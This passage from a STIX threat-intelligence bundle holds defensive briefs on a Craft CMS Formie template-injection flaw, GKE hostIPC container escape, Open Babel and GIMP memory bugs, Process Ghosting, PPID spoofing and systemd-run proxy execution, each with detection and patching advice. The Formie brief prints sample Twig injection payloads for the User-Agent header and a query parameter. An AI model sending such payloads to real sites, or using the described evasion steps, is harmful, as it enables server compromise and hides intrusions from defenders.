      "description": "## Overview\n\nA critical Server-Side Template Injection (SSTI) vulnerability, tracked as CVE-2026-52889, has been discovered in the `verbb/formie` plugin for Craft CMS. This flaw affects versions `3.0.0-beta.1` up to `3.1.26` and allows an unauthenticated attacker to execute arbitrary code or disclose sensitive information. The vulnerability arises when a public-facing form contains a Hidden field configured with a dynamic, request-derived default value (e.g., HTTP User Agent, Referer URL, Current URL, Query Parameter, or Cookie Value). Attackers can inject malicious Twig templating syntax into these request fields, which is then evaluated server-side during front-end form rendering. This could lead to a complete compromise of the affected Craft CMS instance, exposing data, modifying application state, or enabling remote code execution, making immediate patching crucial for defenders.\n\n## Attack Chain\n\n1.  Attacker identifies a Craft CMS instance utilizing the vulnerable Formie plugin (versions \u003e= 3.0.0-beta.1 and \u003c= 3.1.26).\n2.  Attacker scans for public-facing forms on the target instance that contain a Hidden field configured to use a request-derived default value (e.g., HTTP User Agent, Referer URL, Query Parameter, or Cookie Value).\n3.  Attacker crafts a specially malformed HTTP request targeting the identified form.\n4.  The malicious request embeds Twig template syntax within the value of the request-derived field (e.g., `User-Agent: {{_self.env.getconfig()}}` or `?param={{7*7}}`).\n5.  The Formie plugin, specifically within the `Hidden::getFrontEndInputOptions()` function, copies the attacker-controlled input directly into the `defaultValue` for the Hidden field.\n6.  During the subsequent front-end rendering process of the form, Craft CMS's Twig rendering engine evaluates the malicious `defaultValue` server-side, executing the injected Twig syntax.\n7.  Successful exploitation results in Server-Side Template Injection, potentially leading to remote code execution, disclosure of sensitive application or system information, or unauthorized modification of application state.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-52889 allows an unauthenticated attacker to trigger server-side template evaluation simply by visiting a crafted URL. Depending on the injected payload and the site's Craft CMS configuration, this can lead to severe consequences including arbitrary remote code execution on the server hosting the Craft CMS instance. Other potential impacts include the disclosure of sensitive application data, database credentials, or system configurations, and unauthorized modification of the application's state, potentially defacing websites or disrupting services. The unauthenticated nature of the vulnerability means any public-facing vulnerable form is at risk.\n\n## Recommendation\n\n*   Immediately update `verbb/formie` to version `3.1.27` or later to patch CVE-2026-52889.\n*   As a temporary workaround until patching, audit all public forms and remove or reconfigure any Hidden fields using request-derived default values, specifically: HTTP User Agent, HTTP Refer URL, Current URL, Current URL without Query String, Query Parameter, or Cookie Value, as noted in the summary.\n*   Deploy the provided Sigma rule \"Detects CVE-2026-52889 Exploitation — Formie SSTI via Request-Derived Hidden Fields\" to your SIEM/detection platform and tune it for your environment to identify attempted exploitation.\n",
      "published": "2026-07-06T17:01:15Z",
      "labels": [
        "server-side-template-injection",
        "web-vulnerability",
        "craft-cms",
        "formie",
        "rce",
        "cve-2026-52889",
        "network"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-565m-g33j-jq96"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Escape to Host",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1611",
          "url": "https://attack.mitre.org/techniques/T1611"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--5a6ddb45-9a01-5e39-8239-be3c14dfb212",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--21172f29-b085-55e7-9813-bb2b603b7c23",
      "target_ref": "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3b9eadfb-cda2-56c5-95f3-e9f47c4788ee",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Deploy Container",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1610",
          "url": "https://attack.mitre.org/techniques/T1610"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d5eb3365-252b-501c-a10f-670d2f292a67",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--21172f29-b085-55e7-9813-bb2b603b7c23",
      "target_ref": "attack-pattern--3b9eadfb-cda2-56c5-95f3-e9f47c4788ee"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--21172f29-b085-55e7-9813-bb2b603b7c23",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "GKE Pod Created With HostIPC Sharing",
      "description": "## Overview\n\nThis threat brief describes a privilege escalation vector in Google Kubernetes Engine (GKE) where an attacker with appropriate permissions creates or modifies a Kubernetes pod to enable `hostIPC` namespace sharing. This configuration allows the pod to access and manipulate Inter-Process Communication (IPC) mechanisms on the underlying host node, potentially leading to unauthorized access and control over the host operating system. This technique is a well-known method for container escape and privilege escalation in Kubernetes environments, enabling a compromised pod to break out of its isolation and affect other workloads or the cluster infrastructure. Defenders should focus on detecting this specific pod configuration to prevent adversaries from elevating their privileges within GKE clusters.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker gains initial access to the GKE cluster, potentially through compromised credentials, exploitation of a vulnerable application running within a pod, or misconfigured access controls.\n2.  **Privilege Discovery**: The attacker assesses their current permissions within the cluster, identifying roles or service accounts that allow for pod creation, update, or patching.\n3.  **Malicious Pod Specification**: The attacker crafts a Kubernetes pod specification that includes `hostIPC: true` in its configuration.\n4.  **Pod Creation/Modification**: The attacker either creates a new pod with the malicious specification or patches an existing pod to enable `hostIPC` sharing. This action requires specific API permissions within the GKE cluster.\n5.  **Host IPC Access**: The newly created or modified pod is now able to interact with the host system's IPC facilities, such as System V IPC or POSIX message queues.\n6.  **Privilege Escalation**: The attacker leverages the host IPC access to exploit vulnerabilities or misconfigurations on the host node, allowing them to gain elevated privileges or achieve a container escape.\n7.  **Impact**: With host-level privileges, the attacker can then perform further actions, including lateral movement to other nodes, data exfiltration from the host, or disruption of critical cluster services.\n\n## Impact\n\nSuccessful exploitation of this privilege escalation technique allows an attacker to break out of the container's isolation and gain elevated privileges on the underlying GKE host node. This can lead to a complete compromise of the node, enabling the adversary to access sensitive data, install malicious software, disrupt services running on the node, or potentially move laterally to other nodes or even the entire Kubernetes cluster control plane. While no specific victim count is provided, any organization utilizing GKE clusters is susceptible if proper security controls are not in place to prevent or detect such configurations.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"GKE Pod Created With HostIPC\" to your SIEM to detect attempts to create or modify pods with host IPC enabled.\n*   Ensure GKE audit logging is enabled and configured to capture `io.k8s.core.v1.pods.create`, `io.k8s.core.v1.pods.update`, and `io.k8s.core.v1.pods.patch` events for the `gcp.audit` log source.\n*   Implement and enforce Pod Security Standards (PSS) or Pod Security Policies (PSP, deprecated) in your GKE clusters to prevent the deployment of pods with `hostIPC: true` in untrusted namespaces.\n*   Baseline legitimate usage of `hostIPC` in your environment and configure exclusions in the \"GKE Pod Created With HostIPC\" rule for trusted users or namespaces if necessary, after thorough review.\n",
      "published": "2026-07-06T16:54:43Z",
      "labels": [
        "gcp",
        "kubernetes",
        "privilege-escalation",
        "container-security",
        "cloud-security",
        "host-ipc"
      ],
      "object_refs": [
        "attack-pattern--59f348cb-9ef6-5341-9b2e-325eadda7b79",
        "attack-pattern--3b9eadfb-cda2-56c5-95f3-e9f47c4788ee"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://kubernetes.io/docs/concepts/security/pod-security-standards/"
        },
        {
          "source_name": "reference",
          "url": "https://bishopfox.com/blog/kubernetes-pod-privilege-escalation"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--294e958d-6732-5e4e-9373-8b2ac95739fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--86897405-a4c7-55da-9efb-5538089cd0df",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--86897405-a4c7-55da-9efb-5538089cd0df",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open Babel Out-of-Bounds Write in MSI Parser (CVE-2022-46295)",
      "description": "## Overview\n\nA significant memory-safety vulnerability, tracked as CVE-2022-46295, has been identified in Open Babel, a widely used C++ library and command-line interface for interconverting chemical file formats. The flaw specifically resides within the MSI parser, where a fixed-size `translationVectors[]` array is susceptible to an out-of-bounds write. Attackers can exploit this by crafting a malformed MSI file that, when processed by vulnerable versions of Open Babel (all releases up to and including 3.1.1), causes the parser to write more vectors than the array's capacity. This memory corruption can lead to denial of service or, in more advanced scenarios, arbitrary code execution. Given Open Babel's inclusion in various Linux distributions and its integration into services that may process untrusted input, the potential impact is broad, affecting scientific, pharmaceutical, and chemical sectors. The vulnerability was patched in Open Babel version 3.2.0, released in May 2026, following a report by Cisco TALOS.\n\n## Attack Chain\n\n1.  **Attacker Crafts Malicious MSI File**: An attacker creates a specially malformed MSI file designed to push more cell translation vectors than the `translationVectors[]` array can hold within Open Babel's MSI parser.\n2.  **Delivery of Malicious File**: The crafted MSI file is delivered to a target system, often via email, malicious download, or an untrusted file share.\n3.  **Victim Processes Malicious File**: The victim opens the malicious MSI file using the `obabel` command-line tool, an application that links the `OBConversion` API, or any of Open Babel's language bindings (e.g., Python, Ruby, Java, R, Perl, C#, PHP).\n4.  **Vulnerable Parsing Initiated**: Open Babel's MSI parser initiates processing of the malformed input file to extract chemical structure data.\n5.  **Out-of-Bounds Write Occurs**: During the parsing of the crafted MSI file, the vulnerable logic attempts to write an excessive number of cell translation vectors into the fixed-size `translationVectors[]` array, resulting in an out-of-bounds write past the array's allocated memory region.\n6.  **Memory Corruption**: The out-of-bounds write corrupts adjacent memory, leading to unpredictable program behavior.\n7.  **Denial of Service or Arbitrary Code Execution**: This memory corruption can cause the application to crash, resulting in a denial of service, or potentially be leveraged by an attacker to achieve arbitrary code execution on the compromised system.\n\n## Impact\n\nThis vulnerability, CVE-2022-46295, impacts organizations utilizing Open Babel for chemical file format processing, particularly those handling untrusted MSI files. Due to Open Babel's common inclusion in Linux distributions and its embedding within various services, a wide array of sectors, from academic research to pharmaceutical and chemical industries, could be affected. Successful exploitation results in memory corruption, leading to application crashes and denial of service, or potentially allowing an attacker to achieve arbitrary code execution, compromising data integrity, confidentiality, or system control.\n\n## Recommendation\n\n*   Upgrade all installations of Open Babel to version 3.2.0 or newer to remediate CVE-2022-46295.\n*   Implement strict input validation and sandboxing for applications processing untrusted MSI files using Open Babel to limit the potential impact of memory corruption vulnerabilities like CVE-2022-46295.\n*   Monitor systems for crashes of `obabel` processes or applications linked against `OBConversion` library functions, which could indicate attempts at exploiting vulnerabilities like CVE-2022-46295.\n",
      "published": "2026-07-03T12:46:55Z",
      "labels": [
        "memory-corruption",
        "vulnerability",
        "library",
        "cpp",
        "ghsa"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f8h2-c479-vqxf"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openbabel/openbabel/commit/40e85213"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Process Injection",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1055",
          "url": "https://attack.mitre.org/techniques/T1055"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--72c6cdb1-eedd-5e6a-b54d-02b4f6bbd20d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--74af12d4-2df5-57a1-b4e6-683055ef0877",
      "target_ref": "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hide Artifacts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1564",
          "url": "https://attack.mitre.org/techniques/T1564"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0446028e-9656-5dab-837a-f0fc7ce5048e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--74af12d4-2df5-57a1-b4e6-683055ef0877",
      "target_ref": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--74af12d4-2df5-57a1-b4e6-683055ef0877",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Execution Of Non-Existing File via Process Ghosting",
      "description": "## Overview\n\nThis brief details the Process Ghosting technique, an advanced evasion method leveraged by attackers to create and execute processes from files that no longer exist on disk. First documented in late 2021 by security researchers, Process Ghosting capitalizes on specific Windows kernel mechanics and Native API calls to bypass traditional endpoint detection and response (EDR) solutions that rely on disk-based file integrity checks for process attribution. Attackers employ this method to obfuscate their activities, making it challenging for defenders to trace the origin of a malicious process, attribute it to a specific executable, and ultimately hinder forensic investigations. This technique is a significant concern for security teams as it allows malicious code to run with reduced detectability and can be combined with other techniques like process injection (T1055) or privilege escalation (TA0004).\n\n## Attack Chain\n\n1.  Attacker initiates a process creation using Windows Native APIs, specifically `NtCreateProcessEx` and `NtCreateSection`, preparing to map a file into memory.\n2.  A transactional file is created on disk (e.g., using `CreateFileTransacted`), containing the malicious payload, and then mapped into a new section object.\n3.  The transaction for the file is then rolled back (`RollbackTransaction`), causing the original malicious file to be immediately removed from disk.\n4.  Despite the file's deletion from disk, its content remains mapped in the process's memory section, appearing as a ghost image.\n5.  The attacker can optionally use `NtWriteVirtualMemory` to further modify or inject code into the mapped memory region, potentially escalating privileges or modifying behavior.\n6.  The process execution is then started (e.g., via `NtCreateThreadEx`), running the malicious code directly from memory.\n7.  Logging systems, attempting to record the process's original image path (like Sysmon Event ID 1), find no corresponding file on disk, leading to a null or non-absolute path in process creation logs, effectively evading disk-based file integrity checks.\n\n## Impact\n\nSuccessful deployment of Process Ghosting significantly degrades an organization's ability to detect and respond to malicious activity. By executing from non-existent files, attackers can bypass security controls that scan or monitor executable files on disk, such as antivirus and some EDR capabilities. This technique complicates incident response, making forensic analysis more difficult as the original malicious binary is not available for collection and attribution. If undetected, this can lead to prolonged attacker presence, data exfiltration, system compromise, or further deployment of ransomware, increasing recovery costs and potential regulatory fines, potentially affecting any sector.\n\n## Recommendation\n\n*   Enable Sysmon process-creation logging (Event ID 1) with `Image` and `CommandLine` fields to capture the necessary telemetry for the rule \"Execution Of Non-Existing File\".\n*   Deploy the \"Execution Of Non-Existing File\" Sigma rule in this brief to your SIEM and tune it for your environment to detect `Image` paths that are `null` or non-absolute.\n*   Review logs for processes with null or non-absolute paths in the `Image` field, specifically looking for `MemCompression`, `Registry`, `System`, `vmmem`, or `vmmemWSL` processes with non-absolute paths which may indicate this evasion technique.\n",
      "published": "2026-07-06T15:49:46Z",
      "labels": [
        "evasion",
        "process-injection",
        "windows",
        "stealth"
      ],
      "object_refs": [
        "attack-pattern--5ef49edb-94d7-5032-9ce1-22d917ae63a7",
        "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/SigmaHQ/sigma/blob/main/rules/windows/process_creation/proc_creation_win_susp_image_missing.yml"
        },
        {
          "source_name": "reference",
          "url": "https://pentestlaboratories.com/2021/12/08/process-ghosting/"
        },
        {
          "source_name": "reference",
          "url": "https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--418ec0d0-3836-5aac-8895-d0977fc7af86",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-58380: GIMP PNM Parser Off-by-One Error Leads to RCE",
      "description": "## Overview\n\nCVE-2026-58380 details a critical vulnerability discovered in GIMP's PNM (Portable Anymap) image file format parser. The flaw resides within the `pnmscanner_gettoken()` function, where an off-by-one error during a loop boundary check causes a null terminator to be written one byte beyond the intended boundary of a stack-allocated buffer. This memory corruption is triggered when GIMP attempts to parse a specially crafted PNM file. While not yet observed in active exploitation, successful exploitation could lead to application instability and denial of service due to crashes, or, more severely, arbitrary code execution, granting an attacker control over the compromised system. This vulnerability affects various GIMP versions, including those shipped with Red Hat Enterprise Linux distributions.\n\n## Attack Chain\n\n1. An attacker crafts a malicious PNM image file specifically designed to exploit the off-by-one error in GIMP's `pnmscanner_gettoken()` function.\n2. The malicious PNM file is delivered to a victim through common vectors such as email attachments, malicious websites, or untrusted file shares.\n3. The victim opens the specially crafted PNM file using the vulnerable GIMP application.\n4. During the file parsing process, the `pnmscanner_gettoken()` function attempts to process the malicious input.\n5. The off-by-one error causes a null byte to be written past the end of a stack buffer, corrupting adjacent memory.\n6. This memory corruption disrupts program execution flow, leading to either an immediate application crash (denial of service) or, under controlled conditions, enables arbitrary code execution on the victim's system.\n\n## Impact\n\nThe vulnerability, CVE-2026-58380, carries a CVSS v3.1 Base Score of 7.3 (High), indicating significant potential impact. If successfully exploited, systems running vulnerable versions of GIMP could suffer from denial of service, where the application crashes, leading to loss of productivity. More critically, an attacker could achieve arbitrary code execution, allowing them to install malware, exfiltrate data, or gain full control over the compromised system. While there are no reports of in-the-wild exploitation, the widespread use of GIMP, particularly on Linux distributions like Red Hat Enterprise Linux, makes this a high-risk vulnerability.\n\n## Recommendation\n\n*   Apply available patches for CVE-2026-58380 immediately to all GIMP installations, particularly on Red Hat Enterprise Linux systems, by referring to the official Red Hat security advisory at `https://access.redhat.com/security/cve/CVE-2026-58380`.\n*   Monitor Red Hat security channels for updates to affected products as detailed in the Red Hat advisory and apply them promptly.\n*   Implement user awareness training regarding the risks associated with opening untrusted image files, especially those in less common formats like PNM.\n",
      "published": "2026-07-06T15:25:56Z",
      "labels": [
        "vulnerability",
        "memory-corruption",
        "buffer-overflow",
        "GIMP",
        "linux"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58380"
        },
        {
          "source_name": "reference",
          "url": "https://access.redhat.com/security/cve/CVE-2026-58380"
        },
        {
          "source_name": "reference",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2496135"
        },
        {
          "source_name": "reference",
          "url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/83699817"
        },
        {
          "source_name": "reference",
          "url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/16206"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--795e0dc0-384c-5fff-a1a3-4ec9857c249d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Access Token Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1134",
          "url": "https://attack.mitre.org/techniques/T1134"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6f7e477c-6fd3-59a4-aeef-9d785db147f7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6a01c3c7-b0ae-5680-b4ff-5c6df2799e8d",
      "target_ref": "attack-pattern--795e0dc0-384c-5fff-a1a3-4ec9857c249d"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6a01c3c7-b0ae-5680-b4ff-5c6df2799e8d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Privileges Elevation via Parent Process PID Spoofing",
      "description": "## Overview\n\nAdversaries are known to employ parent process ID (PPID) spoofing as a technique to elevate privileges and evade detection on Windows operating systems. This method involves manipulating the `ParentProcessId` attribute of a newly created process, making it appear as if a legitimate, trusted parent process, such as a system service or explorer.exe, initiated it. This tactic allows malicious processes to operate under SYSTEM user privileges, making them harder to identify by security tools that rely on process lineage for behavioral analysis. The technique bypasses common monitoring by creating a misleading process tree, enabling the elevated process to carry out further malicious activities with increased stealth and access. While no specific campaign or actor is detailed, this technique is a common component in post-exploitation frameworks and malware to maintain persistence and escalate capabilities.\n\n## Attack Chain\n\n1.  **Initial Compromise**: An adversary gains initial access to a Windows system through various means (e.g., spearphishing, exploiting a vulnerable service).\n2.  **Malicious Process Execution**: The attacker executes a preliminary malicious process (e.g., a custom tool, a dropper) on the compromised host.\n3.  **PPID Spoofing Setup**: This malicious process prepares to launch a new child process, leveraging Windows APIs like `UpdateProcThreadAttribute` to specify a fabricated `ParentProcessId`.\n4.  **Legitimate Parent Impersonation**: The attacker selects a legitimate and trusted system process (e.g., `explorer.exe`, `services.exe`, `svchost.exe`) whose PID will be reported as the parent of the new child process.\n5.  **Elevated Process Creation**: The new child process is created with the spoofed `ParentProcessId` and typically configured to run with elevated privileges, often as the SYSTEM user.\n6.  **Malicious Activity**: The SYSTEM-level process executes its payload, performing actions such as disabling security features, deploying additional malware, establishing persistence, or initiating data exfiltration and lateral movement, appearing to originate from a benign parent.\n\n## Impact\n\nSuccessful exploitation of PPID spoofing for privilege escalation grants attackers SYSTEM-level access on compromised Windows machines. This high level of privilege allows for complete control over the system, enabling adversaries to bypass most security controls, access sensitive data, install rootkits, establish persistent backdoors, and move laterally across the network unimpeded. While no specific victim counts or industry sectors are mentioned, any organization running Windows systems is susceptible to this technique if not properly monitored. The primary damage is the full compromise of the affected system and potential further compromise of the entire network.\n\n## Recommendation\n\n*   Deploy the detection rule for \"Privileges Elevation via Parent Process PID Spoofing\" provided in this brief to your SIEM/EDR and tune for your environment.\n*   Ensure comprehensive process logging is enabled (e.g., via Elastic Defend or Sysmon Event ID 1) to capture `ProcessId`, `ParentProcessId`, `CommandLine`, `User`, and `IntegrityLevel` for all process creations.\n*   Investigate alerts by comparing the `process.parent.Ext.real.pid` with the `process.parent.pid` as suggested in the rule's investigation guide to identify discrepancies for SYSTEM-level processes.\n*   Carefully review processes identified as having spoofed PPIDs, paying close attention to their `process.executable`, `process.command_line`, and any subsequent child processes they launch, as detailed in the investigation steps.\n*   Regularly review and fine-tune false positives based on legitimate software that may exhibit similar behavior (e.g., specific accessibility tools or remote management software) as identified in the rule's false positive analysis.\n",
      "published": "2026-07-06T15:09:17Z",
      "labels": [
        "privilege-escalation",
        "ppid-spoofing",
        "windows",
        "evasion",
        "elastic-defend"
      ],
      "object_refs": [
        "attack-pattern--795e0dc0-384c-5fff-a1a3-4ec9857c249d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://gist.github.com/xpn/a057a26ec81e736518ee50848b9c2cd6"
        },
        {
          "source_name": "reference",
          "url": "https://blog.didierstevens.com/2017/03/20/that-is-not-my-child-process/"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-updateprocthreadattribute"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/privilege_escalation_via_ppid_spoofing.toml"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "System Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--45e81f3a-8448-5199-a062-396506882175",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b2bed94d-b01d-5f16-a2ed-ff20dd91a890",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--042bde83-a128-575e-a26f-e93053b5c577",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b2bed94d-b01d-5f16-a2ed-ff20dd91a890",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--07e78824-3b52-5b61-a447-4d27c7fdaf72",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b2bed94d-b01d-5f16-a2ed-ff20dd91a890",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b2bed94d-b01d-5f16-a2ed-ff20dd91a890",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Potential Proxy Execution via Systemd-run on Linux",
      "description": "## Overview\n\nThis threat brief outlines a technique where adversaries utilize the `systemd-run` binary on Linux systems for proxy execution, a method aimed at defense evasion and enabling command execution. `systemd-run` is a legitimate system utility designed to schedule commands for background execution through `systemd`. Attackers can exploit this functionality to run malicious payloads, such as shells, downloaders, or credential-harvesting scripts, as transient services or scopes. This technique allows them to detach their processes, obscure the direct parent-child relationships in the process tree, and mask their activities behind a trusted system utility, significantly reducing visibility for defenders. The technique can be used post-initial access to establish persistence, expand access, or facilitate data exfiltration without directly revealing the true malicious parent process.\n\n## Attack Chain\n\n1.  An attacker gains initial access to a Linux system, often via exploitation of a vulnerable service, compromised credentials, or a successful phishing attempt.\n2.  After establishing a foothold, the attacker performs reconnaissance to understand the environment and identifies `systemd-run` as a potential tool for evading detection.\n3.  The attacker stages a malicious payload (e.g., a reverse shell script, a downloader for additional malware, or a credential harvesting tool) onto the compromised system, possibly in a temporary directory.\n4.  The attacker executes the malicious payload using `systemd-run`, typically with options like `--user` or `--scope`, to launch it as a transient systemd unit or scope, detaching it from the initiating process.\n5.  `systemd-run` acts as a proxy, launching the malicious command or script in the background, making it appear as a legitimate systemd-managed process.\n6.  The detached malicious payload executes, performing its intended actions such as establishing command and control, downloading further stages, escalating privileges, or exfiltrating data.\n7.  The attacker might configure persistence mechanisms within the transient unit definition or by other means, ensuring continued access even after the initial session ends.\n\n## Impact\n\nIf successful, attacks employing `systemd-run` for proxy execution can lead to significant compromises. Adversaries can execute arbitrary commands, establish covert persistence, download additional malicious tooling, or exfiltrate sensitive data without being easily detected through conventional process monitoring. The use of detached, transient units complicates forensic analysis and incident response by obfuscating the true origin and nature of the malicious processes. This can result in full system compromise, severe data breaches, unauthorized privilege escalation, or lateral movement across the network, making remediation challenging and prolonged.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect Potential Proxy Execution via Systemd-run\" in this brief to your SIEM and tune for your environment.\n*   When triggered by the Sigma rule, reconstruct the full process tree around the `systemd-run` event to determine which user, shell, script, service, or remote access session invoked it.\n*   Review the exact command passed through `systemd-run`, including flags such as `--user`, `--scope`, scheduling options, or custom unit names, to classify the spawned payload as expected or suspicious.\n*   Isolate any affected Linux host from the network immediately, and terminate the malicious `systemd-run` transient unit or scope along with any child processes it launched.\n*   Remove attacker persistence by deleting unauthorized unit files and drop-ins from `/etc/systemd/system/`, `/run/systemd/transient/`, `/var/lib/systemd/`, and affected users’ `~/.config/systemd/user/` directories.\n",
      "published": "2026-07-06T14:39:26Z",
      "labels": [
        "defense-evasion",
        "execution",
        "linux"
      ],
